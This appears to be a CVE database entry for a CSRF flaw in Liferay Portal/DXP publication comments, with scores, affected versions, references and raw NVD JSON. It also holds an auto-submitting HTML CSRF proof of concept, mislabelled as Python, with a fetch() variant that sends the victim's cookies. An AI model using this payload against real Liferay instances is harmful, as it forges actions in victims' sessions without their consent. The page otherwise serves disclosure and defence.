CVE-2025-62245

Description

Cross-site request forgery (CSRF) vulnerability in Liferay Portal 7.4.1 through 7.4.3.112, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.10, and 7.4 GA through update 92 allows remote attackers to add and edit publication comments.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:digital_experience_platform:7.4:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* - VULNERABLE

Liferay Portal 7.4.1 - 7.4.3.112

Liferay DXP 2023.Q4.0 - 2023.Q4.5

Liferay DXP 2023.Q3.1 - 2023.Q3.10

Liferay DXP 7.4 GA - update 92

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-62245 CSRF PoC for Liferay Portal/DXP Publication Comments -->
<!-- This PoC demonstrates how an attacker can exploit the CSRF vulnerability -->
<!-- to add or edit publication comments on a victim's Liferay instance -->

<html>
<head>
    <title>CVE-2025-62245 CSRF PoC</title>
</head>
<body>
    <!-- The form below will auto-submit when the page loads -->
    <!-- Replace TARGET_URL with the actual Liferay instance URL -->
    <!-- Replace PUBLICATION_ID with the target publication ID -->
    <form id="csrf-form" method="POST" action="https://TARGET_LIFERAY_HOST/o/headless-delivery/v1.0/sites/{siteId}/publications/{publicationId}/comments">
        <!-- Publication comment content to be added/edited -->
        <input type="hidden" name="comment" value="Malicious comment injected via CSRF (CVE-2025-62245)" />
        <input type="hidden" name="description" value="This comment was added without user consent" />
    </form>

    <script>
        // Auto-submit the form when the victim visits this page
        document.getElementById('csrf-form').submit();
    </script>

    <!-- Alternative: Using fetch API for AJAX-based CSRF -->
    <script>
        // Uncomment below for fetch-based CSRF exploitation
        /*
        fetch('https://TARGET_LIFERAY_HOST/o/headless-delivery/v1.0/sites/{siteId}/publications/{publicationId}/comments', {
            method: 'POST',
            credentials: 'include',  // Include cookies for authentication
            headers: {
                'Content-Type': 'application/json',
            },
            body: JSON.stringify({
                comment: 'Malicious comment via CSRF (CVE-2025-62245)',
                description: 'Injected without user consent'
            })
        });
        */
    </script>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62245
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62245
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62245/
[4] VulDB https://vuldb.com/cve/CVE-2025-62245
[5] https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62245

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62245", "sourceIdentifier": "[email protected]", "published": "2025-10-10T20:15:39.373", "lastModified": "2025-12-12T18:11:07.027", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-site request forgery (CSRF) vulnerability in Liferay Portal 7.4.1 through 7.4.3.112, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.10, and 7.4 GA through update 92 allows remote attackers to add and edit publication comments."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.Q3.1", "versionEndIncluding": "2023.Q3.10", "matchCriteriaId": "DB698493-4763-4E87-9764-BC36906CCF5C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q4.0", "versionEndExcluding": "2023.q4.6", "matchCriteriaId": "7C41E249-91C4-4B2D-A8D2-C953A463E14F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:*:*:*:*:*:*:*", "matchCriteriaId": "8E19E344-92B4-4B46-BD89-25EC7191972C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.1", "versionEndExcluding": "7.4.3.113", "matchCriteriaId": "26C6657F-B0C5-46DD-9FE5-25004EC2003D"}]}]}], "references": [{"url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62245", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}